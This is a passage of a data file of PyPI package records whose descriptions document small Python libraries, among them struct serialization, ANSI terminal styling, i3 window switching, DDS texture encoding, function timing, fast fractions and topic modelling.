sizedstudents:Array[Person]And structs can also inherit other structs\n(we even support multiple inheritance!)classEmployee(Person):salary:i32Now let's use the structs we defined# We have 2 options when initializing.# Either by setting each attribute individuallyperson=Person()person.name=\"John Doe\"person.age=42# Or by passing them as keyword argumentsperson=Person(name=\"John Doe\",age=42)The main use for C structs is to convert them from bytes and backdata=person.to_bytes()# Do something with the data# And it's also easy to deserializeperson=Person.from_bytes(data)When deserializing a struct with multiple bases or if one of the fields was overriden,\nthe deserialization must be done through the exact type of the struct.Fixed Size StructsA fixed size struct is any struct that has a known fixed size at build time that doesn't depend on the\ndata it holds. QuickStruct can verify a struct has a fixed size.# The StructFlags.FixedSize flag is used to verify the struct has a fixed size.# If the size could not be verified, a SizeError is raised.classFixedSizeStruct(DataStruct,flags=StructFlags.FixedSize):a:i32b:i8c:f32d:chare:String[10]# 10 character stringf:Person[3]# 3 'person' objects# g: Array[i32] <- not a fixed size field. this will errorStruct PropertiesIt is possible to query some information about a structure.fromquickstructimport*classFixed(DataStruct):s:String[10]x:i32classDynamic(DataStruct):s:Stringx:i32print(\"Fixed.size:\",Fixed.size)# 16 (padding automatically added)print(\"Dynamic.size:\",Dynamic.size)# -1 (dynamic size)print(\"Fixed.is_fixed_size:\",Fixed.is_fixed_size)# Trueprint(\"Dynamic.is_fixed_size:\",Dynamic.is_fixed_size)# Falseprint(\"Fixed.is_dynamic_size:\",Fixed.is_dynamic_size)# Falseprint(\"Dynamic.is_dynamic_size:\",Dynamic.is_dynamic_size)# Trueprint(\"Fixed.fields:\",Fixed.fields)# [s: String[10], __pad_0__: Padding(2), x: i32]print(\"Dynamic.fields:\",Dynamic.fields)# [s: String, x: i32]print(\"Fixed.alignment:\",Fixed.alignment)# 16.print(\"Dynamic.alignment:\",Dynamic.alignment)# -1 (no alignment because dynamic struct can't be aligned).print(\"Fixed.is_final:\",Fixed.is_final)# Falseprint(\"Dynamic.is_final:\",Dynamic.is_final)# Falseprint(\"Fixed.is_protected:\",Fixed.is_protected)# Falseprint(\"Dynamic.is_protected:\",Dynamic.is_protected)# FalseAlignmentIt is also possible to add padding to the struct. There are 2 ways to do that:Manual AlignmentThis can be done with thePaddingtype.classAlignedStruct(DataStruct):c1:char# This adds a single byte padding_pad0:Paddingshort:i16# We can also add multi-byte padding# Here we'll pad to get 8 byte alignment (missing 4 bytes)_pad1:Padding[4]Automatic AlignmentThis can done by passing some flags to the class definition. By default the struct is automatically aligned.# Aligned on 2 byte boundaryclassAlignedStruct(DataStruct,flags=StructFlags.Align2Bytes):c1:char# Padding will be added hereshort:i16Struct FlagsFlagDescriptionDefaultThe default to use if no flags are given. Same asAllowOverride | AlignAuto.NoAlignmentThis is the most packed form of the struct. 
All fields are adjacent with no padding (unless manually added)PackedSame asNoAlignmentexcept thatNoAlignmentis a bit more optimized because no alignment is done.Align1ByteSame asPackedAlign2BytesAligns the fields on 2 byte boundary.Align4BytesAligns the fields on 4 byte boundary.Align8BytesAligns the fields on 8 byte boundary.AlignAutoAligns the fields by their type.ReorderFieldsSpecifies the fields should be reordered in order to make the struct a little more compressed.ForceDataOnlyDeprecated. Specifies that the struct may only contain serializable fields. Data-only structs may only inherit data-only structs.AllowOverrideIf set, fields defined in the struct may override fields that are defined in the base struct.TypeSafeOverrideIf set, when fields are overridden, they must have the same type (which would make it pretty useless to override). ImpliesAllowOverride. If fields have a different type, anUnsafeOverrideErroris raised.ForceSafeOverrideDeprectaed. Same asTypeSafeOverride.FixedSizeIf set, the struct must have a fixed size. If not, an exceptionSizeErroris raised.ForceFixedSizeDeprecated. Same asFixedSize.AllowInlineDeprecated. If set, the struct's fields will be inlined into another struct the contains this struct.ProtectedIf set, denies any overrides of that structure. If a struct is trying to override a field of it, anUnoverridableFieldErroris raised.LockedStructureDeprecated. Same asProtected.FinalMarks the structure so it won't be inheritable by any other class. If a struct is trying to inherit it, anInheritanceErroris raised."} +{"package": "quickstructures", "pacakge-description": "UNKNOWN"} +{"package": "quick-styles", "pacakge-description": "quick_stylesAn unbelievably lightweight Python library for effortlessly applying ANSI escape color & style codes to Windows CMD and other ANSI-supported terminalsDescriptionquick_styles enhances the experience of using the current unintuitive ANSI escape code system for text styling in Python. With quick_styles, you can easily generate ANSI codes with set parameters, save styles for future use, and implement custom codes for personalized styles.DownloadFrom PyPI usingpip:pipinstallquick-stylesUsageExample programBefore we proceed to the explict info regarding the library's functionality, here's a preview of the core functions of quick_styles to get a sense of its capabilities:importquick_stylesasqsprint(\"Hi there! I'm a boring print statement. By default, I am unable to be styled and my appearance is immutable. \"\"Womp womp!\")print(\"\\033[34mTypically, you would have to manually surround me with ANSI escape codes. Not only is this method of \"\"styling tedious, but also makes the text less readable and does not clearly indicate what styles are being \"\"applied to the person inspecting the code.\\033[0m\")qs.xprint(\"Well, well, what do we have here? I'm a styled print statement as well, but there are no ANSI codes \"\"visible. 
It's just an additional parameter!\",color=\"blue\")ex_input=qs.xinput(\"This applies to inputs too!\")qs.xprint(\"This works for applying a text style as well.\",styles=\"bold\")qs.xprint(\"Or multiple...\",styles=[\"bold\",\"underline\"])# To apply a particular assortment of styles to multiple strings, you can create custom ANSI codes to apply in the futureqs.custom_codes[\"red_title\"]=qs.create_code(color=\"black\",bgcolor=\"red\",styles=\"bold\")qs.xprint(\"Not only do I possess the previously listed styles\",custom_code=\"red_title\")qs.xprint(\"but I do as well!\",custom_code=\"red_title\")# There are also modifiers for the content of the string itself, such asqs.xprint(\"a warning format,\",modifier=\"warning\")# ! a warning format, !qs.xprint(\"or prepending the text with the current time!\",modifier=\"time_display\")# [14:19:21] or prepending the text with the current time!# Default values can also be modifiedqs.defaults.values[\"color\"]=\"red\"qs.defaults.values[\"styles\"]=\"bold\"qs.defaults.values[\"modifier\"]=\"warning\"# Subsequent calls without explicit values resort to default valuesqs.xprint(\"I'm styled, yet the parameters aren't directly stated!\")# Specified values override defaultsqs.xprint(\"I'm still special!\",color=\"green\")# Reset function returns defaults to initial valuesqs.defaults.reset()# Strings can also be styled without being immediately printedstyled_string=qs.style_string(\"You can't see me...\",styles=\"italic\")"} +{"package": "quickSvg", "pacakge-description": "quick svg draw."} +{"package": "quickswitch-i3", "pacakge-description": "OverviewThis utility fori3, inspired byPentadactyl\u2019s:bufferscommand, allows\nyou to quickly switch to and locate windows on all your workspaces, using an\ninteractive dmenu prompt. It has since gained a lot of other functionality to\nmake working with i3 even more efficient.UsageFinding windowsThe core functionality of quickswitch is still finding windows and jumping to\nthem, and this is what it does when you call it without any options.Here\u2019s how it looks in action:However, sometimes you may want to grab a window and move it to your current\nworkspace. This can be done with the-m/--moveflag.A similiar feature is the-s/--scratchpadflag, which searches your\nscratchpad, and does ascratchpad showon the window you choose.You can also search and jump (or move) via regular expression using the-r/--regexflag, without using dmenu. This could be useful for\nscripting, or if you are a regex wizard who feels limited by dmenu.Workspacesquickswitch also provides a few functions to manage workspaces. First of\nall, it allows you to search workspaces in the same fashion as windows with the-w/--workspacesflag. This isextremelyuseful for working with many named\nworkspaces without having them bound to any particular key.Another useful feature is to quickly get an empty workspace. This is what the-e/--emptyflag does: it will jump you to the first empty, numbered\nworkspace.If you use this excessively, then your numbered workspaces might fragment a lot.\nYou can fix this easily with-g/--degap, which \u201cdefragments\u201d your\nworkspaces, without affecting their order (eg, [1, 4, 7] becomes [1, 2, 3] by\nrenaming 4 to 2 and 7 to 3).dmenuYou can influence how dmenu is called with the-d/--dmenuflag, which\nexpects a complete dmenu command. The default isdmenu-b-i-l20(which\nmakes dmenu appear on the bottom of your screen (-b) in a vertical manner with\nat most 20 lines (-l 20), and matches case insensitively (-i). 
See the man page\nfor dmenu for a list of options.Note:The versions of quickswitch before 2.0 used explicit flags for changing\ndmenu's behavior. This was rather inflexible, because it needed an explicit flag\nfor every dmenu option, and it hardcoded the dmenu command. For most people, the\ndefault should be fine, but if you want to change anything, this allows you to\ngo wild.Dependenciesquickswitch-i3 requires dmenu (which you likely already have installed), and\ni3-py, which you can install withpip installi3-py.quickswitch-i3 was tested in Python 2.7.3 and 3.2.3. It will not work in versions\nprior to 2.7 due to the usage ofargparse.Installationquickswitch-i3 has a PyPI entry, so you can install it withpip installquickswitch-i3. Alternatively, you can always manually run the setup file withpython setup.py install.Additionally, if you are an Arch user, you can install it from the AUR. The\npackage is calledquickswitch-i3. The PKGBUILD is also included here.An overlay for Gentoo is in the works.Contributions…are obviously welcome. Pretty much every feature in quickswitch originated\nbecause someone (not just me) thought “hey, this would be useful”. Just shoot a\nPull Request.LicenseDisclaimer: quickswitch-i3 is a third party script and in no way affiliated\nwith the i3 project.This program is free software under the terms of the\nDo What The Fuck You Want To Public License.\nIt comes without any warranty, to the extent permitted by\napplicable law. For a copy of the license, see COPYING or\nhead tohttp://sam.zoy.org/wtfpl/COPYING."} +{"package": "quicktable", "pacakge-description": "No description available on PyPI."} +{"package": "quicktake", "pacakge-description": "QuickTakeOff-the-shelf computer vision ML models. Yolov5, gender and age determination.The goal of this repository is to provide easy-to-use, abstracted APIs to powerful computer vision models.Models3 models are currently available:Object detectionGender determinationAge determinationModel EngineThe modelsYoloV5: Object detection. This forms the basis of the other models. Pretrained onCOCO. DocumentationhereGender:ResNet18is used as the model's backend. Transfer learning is applied to model gender. The additional gender training was done on thegender classification dataset, using code extracted fromhere.Age: The age model is an implementation of theSSR-Netpaper:SSR-Net: A Compact Soft Stagewise Regression Network for Age Estimation. ThepyTorchmodel was largely derived fromoukohou.Getting StartedInstall the package with pip:pip install quicktakeUsageBuild an instance of the class:fromquicktakeimportQuickTakeImage InputEach model is designed to handle 3 types of input:raw pixels (torch.Tensor): raw pixels of a single image. Used when streaming video input.image path (str): path to an image. Used when processing a single image.image directory (str): path to a directory of images. Used when processing a directory of images.Expected UseGenderandagedetermination models are trained on faces. 
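For a single, clearly cropped face the age and gender models can be called directly on a frame; a minimal sketch (the image path is a placeholder, and, per the note further on, each call returns its results_ together with the runtime time_):
from quicktake import QuickTake

qt = QuickTake()
# placeholder path to an image containing one cropped face
frame = qt.read_image('./data/face.png')

# each model returns its prediction (results_) along with the runtime (time_)
age_out = qt.age(frame)
gender_out = qt.gender(frame)
print(age_out, gender_out)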
They work fine on a larger image, however, will fail to make multiple predictions in the case of multiple faces in a single image.The API is currently designed to chain models:yolois used to identify objects.IFa person is detected, thegenderandagemodels are used to make predictions.This is neatly bundled in theQuickTake.yolo_loop()method.Getting StartedLaunch a webcam stream:QL=QuickTake()QL.launchStream()Note: Each model returns the resultsresults_as well as the runtimetime_.Run on a single frame:fromIPython.displayimportdisplayfromPILimportImageimportcv2# example imagesimg='./data/random/dave.png'# to avoid distractionsimportwarningswarnings.filterwarnings('ignore')# init modulefromquicktakeimportQuickTakeqt=QuickTake()# extract frame from raw image pathframe=qt.read_image(img)We can now fitqt.age()orqt.gender()on the frame. Alternatively we can cycle through the objects detected byyoloand if a person is detected, fitqt.age()andqt.gender():# generate pointsfor_label,x0,y0,x1,y1,colour,thickness,results,res_df,age_,gender_inqt.yolo_loop(frame):_label=QuickTake.generate_yolo_label(_label)QuickTake.add_block_to_image(frame,_label,x0,y0,x1,y1,colour=colour,thickness=thickness)The result is an image with the bounding boxes and labels, confidence (in yolo prediction), age, and gender if a person is detected..The staged output is also useful:.For a more comprehensiveexampledirectory.FutureI have many more models; deployment methods & applications in the pipeline.If you wish to contribute, please email me@zachcolinwolpe@gmail.com."} +{"package": "quick-templates", "pacakge-description": "No description available on PyPI."} +{"package": "quicktest", "pacakge-description": "# quicktestA nano-framework for quickly unit testing pure functions.Useful as a helper for solvinghttps://www.dailycodingproblem.com/challenges and the like."} +{"package": "quicktester", "pacakge-description": "quicktester is a set of plugins that can be used to quickly runrelevant tests cases.The git-changes plugin will only run tests that are relevant to the\nmodified files, according to git. The fail-only plugin will only run\ntests that have failed in the last few runs. The statistics plugin\ncollects statistics for the fail-only plugin. The quickfix plugin\nhelps vim users to have error traces in a quickfix format."} +{"package": "quicktests", "pacakge-description": "quicktestsA library for python for easy testing.ExampleExample 1: TestBasefromquicktestsimportprint_report,TestBaseclassTest(TestBase):deftest_one_equals_one(self):assert1==1,\"One does not equal one\"deftest_one_equals_one_str(self):assert\"One\"==\"One\",\"\\\"One\\\"does not equal\\\"One\\\"\"if__name__=='__main__':print_report(Test())The code above provides the following information:Ran 2 tests.\nRunning tests took 4.887580871582031e-05 seconds.\nNo failed tests.\nNo errors were found. Add more code to verify your code is working.Example 2: MiniTestfromquicktestsimportprint_report,MiniTestif__name__=='__main__':defcomplex_test():returnFalseprint_report(MiniTest(test_true=[lambda:True,\"Returns True\"],test_false=[lambda:False,\"Returns False\"],test_error=[lambda:1/0,\"This is wrong\"],test_complex=[complex_test,\"This is complex\"],test_with_really_long_name=[lambda:False,\"This is a long name\",]))The code above provides the following information:Ran 5 tests.\nRunning tests took 4.076957702636719e-05 seconds.\n4 failed tests:\n1. test 'complex': -> This is complex\n2. test 'error': -> division by zero\n3. test 'false': -> Returns False\n5. 
test 'with really long name': -> This is a long name"} +{"package": "quicktex", "pacakge-description": "QuicktexA python library for using DDS filesQuicktex is a python library and command line tool for encoding and decoding DDS files.\nIt is based on theRGBCX encoder, which is currently\none of thehighest quality S3TC encoders available.\nQuicktex has a python front end, but the encoding and decoding is all done in C++ for speed\ncomparable to the original library.InstallationFrom Wheel (Easiest)To install, runpipinstallquicktexIf you are on macOS, You need to install openMP from homebrew:brewinstalllibompFrom SourceTo build from source, first clone this repo and cd into it, then run:gitsubmoduleupdate--init\npipinstall.and setuptools will take care of any dependencies for you.If you are on macOS, it is recommended to first install openMP from homebrew to enable\nmultithreading, since it is not included in the default Apple Clang install:brewinstalllibompThe package also makes tests, stub generation, and docs available. To install the\nrequired dependencies for them, install with options like so:pipinstall.[tests,stubs,docs]UsageUsage: quicktex [OPTIONS] COMMAND [ARGS]...\n\n Encode and Decode various image formats\n\nOptions:\n --version Show the version and exit.\n --help Show this message and exit.\n\nCommands:\n decode Decode DDS files to images.\n encode Encode images to DDS files of the given format.To decode DDS files to images, use thedecodesubdommand, along with a glob or a\nlist of files to decode.To encode images to DDS files, use theencodesubcommand, plus an additional\nsubcommand for the format. For example,quicktex encode bc1 bun.pngwill encode\nbun.png in the current directory to a bc1/DXT1 dds file next to it.encodeanddecodeboth accept several common parameters:-f, --flip / -F, --no-flip: Vertically flip image before/after converting.\n[default: True]-r, --remove: Remove input images after converting.-s, --suffix TEXT: Suffix to append to output filename(s).\nIgnored ifoutputis a single file.-o, --output: Output file or directory. If outputting to a file, input filenames\nmust be only a single item. By default, files are converted in place."} +{"package": "quicktick", "pacakge-description": "Output a cryptocurrency price ticker to stdout based on the\nconfiguration found, by default, in~/.quicktick. Options can be\nprovided at the command line to override any part of the ticker\nconfiguration.Installationquicktick requires Python 3.6, or newer, and can be installed usingpip:pip install quicktickUsagequicktick [-h] [-V] [--config CONFIG] [--crypto CRYPTO] [--fiat FIAT] [--template TEMPLATE] [--source SOURCE]Options are as follows:-h,--helpShow this help message and exit-V,--versionShow version and license information--configCONFIGUse alternative configuration file--cryptoCRYPTOSymbol to use as the cryptocurrency--fiatFIATSymbol to use as the fiat currency--templateTEMPLATETemplate name or raw Jinja2 template--sourceSOURCESource for the price dataConfigurationThe configuration is a YAML file, which will be created in your home\ndirectory on first run (if it doesn\u2019t already exist), which defines the\ndefault ticker, how to output price data and how data sources are\ndefined. 
Jinja2 templating is used to make this very adaptable to your\nneeds.The default configuration only defines a data source for theCoinMarketCapAPI with support for:Cryptocurrencies:BitcoinBitcoin CashEthereumLitecoinFiat currencies:US DollarsEurosChinese YuanBritish PoundsPrice data:Exchange rateChange in the last hourCoinMarketCap\u2019s API supports many more options and these can be added to\nyour configuration, as needed. Alternatively, other JSON-based HTTP APIs\ncan be defined as data sources.TickerThe default ticker is defined under thetickersection in the\nconfiguration. It takes four attributes:sourceThe data source to use, defined in thesourcessection.cryptoThe cryptocurrency symbol to use, as defined by thesource.fiatThe fiat currency symbol to use, as defined by thesource.templateThe template to use to render the ticker, defined in thetemplatessection (n.b., this must be a predefined template; a raw Jinja2\ntemplate string can only be used at the command line).TemplatesThetemplatessection is used to define named Jinja2 templates. By\ndefault, there issimpleandansi(which is the same assimple, with ANSI escape sequences used for colour output). When the\ntemplates are rendered, they have access to three sets of data:fiatThe fiat currency symbol (seeData Sourcesfor details).cryptoThe cryptocurrency symbol (seeData Sourcesfor details).Price dataThe price data variables returned by the data source (seeData\nSourcesfor details).Data SourcesThesourcessection is used to define named data sources; that is,\nJSON-based HTTP APIs. Each data source takes four attributes:urlThe URL for the data source; again, a Jinja2 template that is supplied\nwith thefiatandcryptosymbols.dataThis subsection allows you to define the price data variables that are\navailable to the output template. These are again Jinja2 templates\nthat describe the mapping from the API\u2019sjsonresponse, along with\nthecryptoandfiatsymbols.cryptosandfiatsThese subsections allow you to define cryptocurrencies and fiat\ncurrencies, respectively. Conventionally, you would use the symbol\nname as the currency\u2019s identifier, which take a dictionary of named\nparameters. These parameters are then available to the templates that\nuse the symbols.LicenseCopyright (c) 2017 Christopher HarrisonThis program is free software: you can redistribute it and/or modify it\nunder the terms of the GNU General Public License as published by the\nFree Software Foundation, either version 3 of the License, or (at your\noption) any later version.This program is distributed in the hope that it will be useful, but\nWITHOUT ANY WARRANTY; without even the implied warranty of\nMERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General\nPublic License for more details.You should have received a copy of the GNU General Public License along\nwith this program. If not, see ."} +{"package": "quick-time", "pacakge-description": "instant timequick time"} +{"package": "quicktimekeeper", "pacakge-description": "QuickTimeKeeperQuickTimeKeeper is a small Python library for timing how long functions take to run.UsageSimply import QuickTimeKeeper and call thetime_functionmethod to time any function you pass in as the parameter. It returns how long the function took to run. 
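For a function that takes no arguments the call is a one-liner; a minimal sketch using the same import alias as the package's own example (slow_task is just a stand-in for your own function):
import time
import quicktimekeeper as quicktimer

def slow_task():
    # stand-in for real work
    time.sleep(0.25)

# runs slow_task and returns how long it took (reported in ms in the package's example)
elapsed = quicktimer.time_function(slow_task)
print(f"slow_task took {elapsed} ms")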
Optionally, you can pass in extra args totime_functionwhich will be passed into the function to time.importquicktimekeeperasquicktimerdeffibonacci(n):ifn<2:returnnelse:returnfibonacci(n-1)+fibonacci(n-2)time_taken=quicktimer.time_function(fibonacci,n=10)print(f\"It took{time_taken}ms to run fibonacci(10)\")"} +{"package": "quicktimer", "pacakge-description": "TimerAn easy to use python package to handle time measurements in code.Instantiate theTimerclass and insert one-liners withtake_time()between your existing code to take timestamps.Call thefancy_print()function to print a nicely formatted overview of how much time has passed overall, how much time has passed between thetake_time()calls, including percentage per step and passed step-descriptions.InstallationThe package is available onPyPi:pip install quicktimerUsageThe entire functionality is documented in-depth onreadthedocs.\nIn the following a quick overview of the basic functionality is shown.The two main commands aretake_time()andfancy_print().Both can be used without any parameters, although you should pass at least a description totake_time(\"Finished_x!\")to add some context to your measurements.You can either make use of the default output method (printto the console) or you can pass a custom function: for instance to pass the messages to a logger.Using the default output method (print)When nooutput_funcparameter is passed during instantiation, it defaults toprintthe messages to the console as follows:importtimefromquicktimerimportTimerT=Timer()# take the starting timeT.take_time(description=\"The description of the first function-call is not displayed!\")time.sleep(1.1)# code substitute: parsing the dataT.take_time(\"Parsed the data\")time.sleep(0.02)# code substituteT.take_time()time.sleep(0.1)# code substitute: Storing the dataT.take_time(\"Stored the data\",True)T.fancy_print()Output of the code in the console:> Stored the data\n> ------ Time measurements ------\n> Overall: 0:00:01.254049\n> Step 0: 0:00:01.113962 - 88.83 % - Description: Parsed the data\n> Step 1: 0:00:00.030001 - 2.39 % - Description: \n> Step 2: 0:00:00.110086 - 8.78 % - Description: Stored the dataUsing a logger as output methodInstead ofprintingto the console, you can also pass your own function to the module.\nThis can be used with an easily configuredloggerto write the messages to your log.importtimeimportloggingfromquicktimerimportTimer# setting up a loggermy_format=\"%(asctime)s[%(levelname)-5.5s]%(message)s\"logging.basicConfig(filename='test.log',level=logging.INFO,format=my_format)logger=logging.getLogger()# logger.info will be used as the output function instead of printT=Timer(output_func=logger.info)T.take_time()# take the starting timetime.sleep(0.5)# code substitute: parsing the dataT.take_time(\"Parsed the data\")time.sleep(0.1)# code substitute: Storing the dataT.take_time(\"Stored the data\",True)T.fancy_print()Your log would look like this:2021-06-24 13:35:43,275 [INFO ] Stored the data\n2021-06-24 13:35:43,275 [INFO ] ------ Time measurements ------\n2021-06-24 13:35:43,275 [INFO ] Overall: 0:00:00.624691\n2021-06-24 13:35:43,275 [INFO ] Step 0: 0:00:00.512639 - 82.06 % - Description: Parsed the data\n2021-06-24 13:35:43,275 [INFO ] Step 1: 0:00:00.112052 - 17.94 % - Description: Stored the data"} +{"package": "quicktions", "pacakge-description": "Python\u2019sFractiondata type is an excellent way to do exact calculations\nwith unlimited rational numbers and largely beatsDecimalin terms of\nsimplicity, accuracy and safety. 
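As a quick illustration of the exactness meant here (a sketch; quicktions mirrors the stdlib fractions API, so Fraction is used the same way as the standard library class):
from quicktions import Fraction

# binary floats accumulate rounding error...
print(0.1 + 0.2)                          # 0.30000000000000004
# ...while rational arithmetic stays exact
print(Fraction(1, 10) + Fraction(2, 10))  # 3/10
# string construction works as in the stdlib fractions module
print(Fraction('0.1') + Fraction('2/3'))  # 23/30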
Clearly not in terms of speed, though,\ngiven the cdecimal accelerator in Python 3.3+.quicktionsis an adaptation of the originalfractionsmodule\n(as included in CPython 3.11) that is compiled and optimised withCythoninto a fast, native extension module.Compared to the standard libraryfractionsmodule of CPython,\ncomputations inquicktionsare about10x faster in Python 2.7 and 3.46x faster in Python 3.53-4x faster in Python 3.10Compared to thefractionsmodule in CPython 3.10, instantiation of aFractioninquicktionsis also5-15x faster from a floating point string value (e.g.Fraction(\"123.456789\"))3-5x faster from a floating point value (e.g.Fraction(123.456789))2-4x faster from an integer numerator-denominator pair (e.g.Fraction(123, 456))We provide a set of micro-benchmarks here:https://github.com/scoder/quicktions/tree/master/benchmarkAs of quicktions 1.12, the different number types and implementations compare\nas follows in CPython 3.10:Average times for all 'create' benchmarks:\nfloat : 36.17 us (1.0x)\nDecimal : 111.71 us (3.1x)\nFraction : 111.98 us (3.1x)\nPyFraction : 398.80 us (11.0x)\n\nAverage times for all 'compute' benchmarks:\nfloat : 4.53 us (1.0x)\nDecimal : 16.62 us (3.7x)\nFraction : 72.91 us (16.1x)\nPyFraction : 251.93 us (55.6x)While not as fast as the C implementeddecimalmodule in Python 3,quicktionsis about 15x faster than the Python implementeddecimalmodule in Python 2.7.For documentation, see the Python standard library\u2019sfractionsmodule:https://docs.python.org/3/library/fractions.htmlChangeLog1.16 (2024-01-10)Formatting support was improved, following CPython 3.13a3 as ofhttps://github.com/python/cpython/pull/111320Add support for Python 3.13 by using Cython 3.0.8 and callingmath.gcd().1.15 (2023-08-27)Add support for Python 3.12 by using Cython 3.0.2.1.14 (2023-03-19)Implement__format__forFraction, followinghttps://github.com/python/cpython/pull/100161ImplementFraction.is_integer(), followinghttps://github.com/python/cpython/issues/100488Fraction.limit_denominator()is faster, followinghttps://github.com/python/cpython/pull/93730Internal creation of result Fractions is about 10% faster if the calculated\nnumerator/denominator pair is already normalised, followinghttps://github.com/python/cpython/pull/101780Built using Cython 3.0.0b1.1.13 (2022-01-11)Parsing very long numbers from a fraction string was very slow, even slower\nthanfractions.Fraction. The parser is now faster in all cases (and\nstill much faster for shorter numbers).Fractiondid not implement__int__.https://bugs.python.org/issue445471.12 (2022-01-07)Faster and more space friendly pickling and unpickling.https://bugs.python.org/issue44154Algorithmically faster arithmetic for large denominators, although slower for\nsmall fraction components.https://bugs.python.org/issue43420Original patch for CPython by Sergey B. 
Kirpichev and Raymond Hettinger.Make surebool(Fraction)always returns abool.https://bugs.python.org/issue39274Built using Cython 3.0.0a10.1.11 (2019-12-19)FixOverflowErrorwhen parsing string values with long decimal parts.1.10 (2019-08-23)hash(fraction)is substantially faster in Py3.8+, following an optimisation\nin CPython 3.9 (https://bugs.python.org/issue37863).New methodfraction.as_integer_ratio().1.9 (2018-12-26)Substantially faster normalisation (and therefore instantiation) in Py3.5+.//(floordiv) now follows the expected rounding behaviour when used with\nfloats (by converting to float first), and is much faster for integer operations.Fix return type of divmod(), where the first item should be an integer.Further speed up mod and divmod operations.1.8 (2018-12-26)Faster mod and divmod calculation.1.7 (2018-10-16)Faster normalisation and fraction string parsing.Add support for Python 3.7.Built using Cython 0.29.1.6 (2018-03-23)Speed up Fraction creation from a string value by 3-5x.Built using Cython 0.28.1.1.5 (2017-10-22)Result of power operator (**) was not normalised for negative values.Built using Cython 0.27.2.1.4 (2017-09-16)Rebuilt using Cython 0.26.1 to improve support of Python 3.7.1.3 (2016-07-24)repair the faster instantiation from Decimal values in Python 3.6avoid potential glitch for certain large numbers in normalisation under Python 2.x1.2 (2016-04-08)change hash function in Python 2.x to match that offractions.Fraction1.1 (2016-03-29)faster instantiation from float valuesfaster instantiation from Decimal values in Python 3.61.0 (2015-09-10)Fraction.imagproperty could return non-zeroparsing strings with long fraction parts could use an incorrect scale0.7 (2014-10-09)faster instantiation from float and string valuesfix test in Python 2.x0.6 (2014-10-09)faster normalisation (and thus instantiation)0.5 (2014-10-06)faster math operations0.4 (2014-10-06)enable legacy division support in Python 2.x0.3 (2014-10-05)minor behavioural fixes in corner cases under Python 2.x\n(now passes all test in Py2.7 as well)0.2 (2014-10-03)cache hash value of Fractions0.1 (2014-09-24)initial public release"} +{"package": "quicktok", "pacakge-description": "No description available on PyPI."} +{"package": "quicktools", "pacakge-description": "quicktoolsThis is a python functions tools module for enhancing python grammar structures and functions"} +{"package": "quick-topic", "pacakge-description": "Quick Topic Mining Toolkit (QTMT)Thequick-topictoolkit allows us to quickly evaluate topic models in various methods.FeaturesTopic Prevalence Trends AnalysisTopic Interaction Strength AnalysisTopic Transition AnalysisTopic Trends of Numbers of Document Containing KeywordsTopic Trends Correlation AnalysisTopic Similarity between TrendsSummarize Sentence Numbers By KeywordsTopic visualizationThis version supports topic modeling from both English and Chinese text.Basic UsageExample: generate topic models for each category in the dataset filesfromquick_topic.topic_modeling.ldaimportbuild_lda_models# step 1: data filemeta_csv_file=\"datasets/list_country.csv\"raw_text_folder=\"datasets/raw_text\"# term files used for word segementationlist_term_file=[\"../datasets/keywords/countries.csv\",\"../datasets/keywords/leaders_unique_names.csv\",\"../datasets/keywords/carbon2.csv\"]# removed wordsstop_words_path=\"../datasets/stopwords/hit_stopwords.txt\"# run 
shelllist_category=build_lda_models(meta_csv_file=meta_csv_file,raw_text_folder=raw_text_folder,output_folder=\"results/topic_modeling\",list_term_file=list_term_file,stopwords_path=stop_words_path,prefix_filename=\"text_\",num_topics=6)GUIAfter installing thequick-topicpackage, runqtmtin the Terminal to call the GUI application.$ qtmtAdvanced UsageExample 1: Topic Prevalence over Timefromquick_topic.topic_prevalence.mainimport*# data file: a csv file; a folder with txt files named the same as the ID field in the csv filemeta_csv_file=\"datasets/list_country.csv\"text_root=r\"datasets/raw_text\"# word segmentation data fileslist_keywords_path=[\"../datasets/keywords/countries.csv\",\"../datasets/keywords/leaders_unique_names.csv\",\"../datasets/keywords/carbon2.csv\"]# remove keywordsstop_words_path=\"../datasets/stopwords/hit_stopwords.txt\"# date range for analysisstart_year=2010end_year=2021# used topicslabel_names=['\u7ecf\u6d4e\u4e3b\u9898','\u80fd\u6e90\u4e3b\u9898','\u516c\u4f17\u4e3b\u9898','\u653f\u5e9c\u4e3b\u9898']topic_economics=['\u6295\u8d44','\u878d\u8d44','\u7ecf\u6d4e','\u79df\u91d1','\u653f\u5e9c','\u5c31\u4e1a','\u5c97\u4f4d','\u5de5\u4f5c','\u804c\u4e1a','\u6280\u80fd']topic_energy=['\u7eff\u8272','\u6392\u653e','\u6c22\u80fd','\u751f\u7269\u80fd','\u5929\u7136\u6c14','\u98ce\u80fd','\u77f3\u6cb9','\u7164\u70ad','\u7535\u529b','\u80fd\u6e90','\u6d88\u8017','\u77ff\u4ea7','\u71c3\u6599','\u7535\u7f51','\u53d1\u7535']topic_people=['\u5065\u5eb7','\u7a7a\u6c14\u6c61\u67d3','\u5bb6\u5ead','\u80fd\u6e90\u652f\u51fa','\u884c\u4e3a','\u4ef7\u683c','\u7a7a\u6c14\u6392\u653e\u7269','\u6b7b\u4ea1','\u70f9\u996a','\u652f\u51fa','\u53ef\u518d\u751f','\u6db2\u5316\u77f3\u6cb9\u6c14','\u6c61\u67d3\u7269','\u56de\u6536','\u6536\u5165','\u516c\u6c11','\u6c11\u4f17']topic_government=['\u5b89\u5168','\u80fd\u6e90\u5b89\u5168','\u77f3\u6cb9\u5b89\u5168','\u5929\u7136\u6c14\u5b89\u5168','\u7535\u529b\u5b89\u5168','\u57fa\u7840\u8bbe\u65bd','\u96f6\u552e\u4e1a','\u56fd\u9645\u5408\u4f5c','\u7a0e\u6536','\u7535\u7f51','\u51fa\u53e3','\u8f93\u7535','\u7535\u7f51\u6269\u5efa','\u653f\u5e9c','\u89c4\u6a21\u7ecf\u6d4e']list_topics=[topic_economics,topic_energy,topic_people,topic_government]# run-allrun_topic_prevalence(meta_csv_file=meta_csv_file,raw_text_folder=text_root,save_root_folder=\"results/topic_prevalence\",list_keywords_path=list_keywords_path,stop_words_path=stop_words_path,start_year=start_year,end_year=end_year,label_names=label_names,list_topics=list_topics,tag_field=\"area\",time_field=\"date\",id_field=\"fileId\",prefix_filename=\"text_\",)Example 2: Estimate the strength of topic interaction (shared keywords) from different topicsfromquick_topic.topic_interaction.mainimport*# step 1: data filemeta_csv_file=\"datasets/list_country.csv\"text_root=r\"datasets/raw_text\"# step2: jieba cut words filelist_keywords_path=[\"../datasets/keywords/countries.csv\",\"../datasets/keywords/leaders_unique_names.csv\",\"../datasets/keywords/carbon2.csv\"]# remove 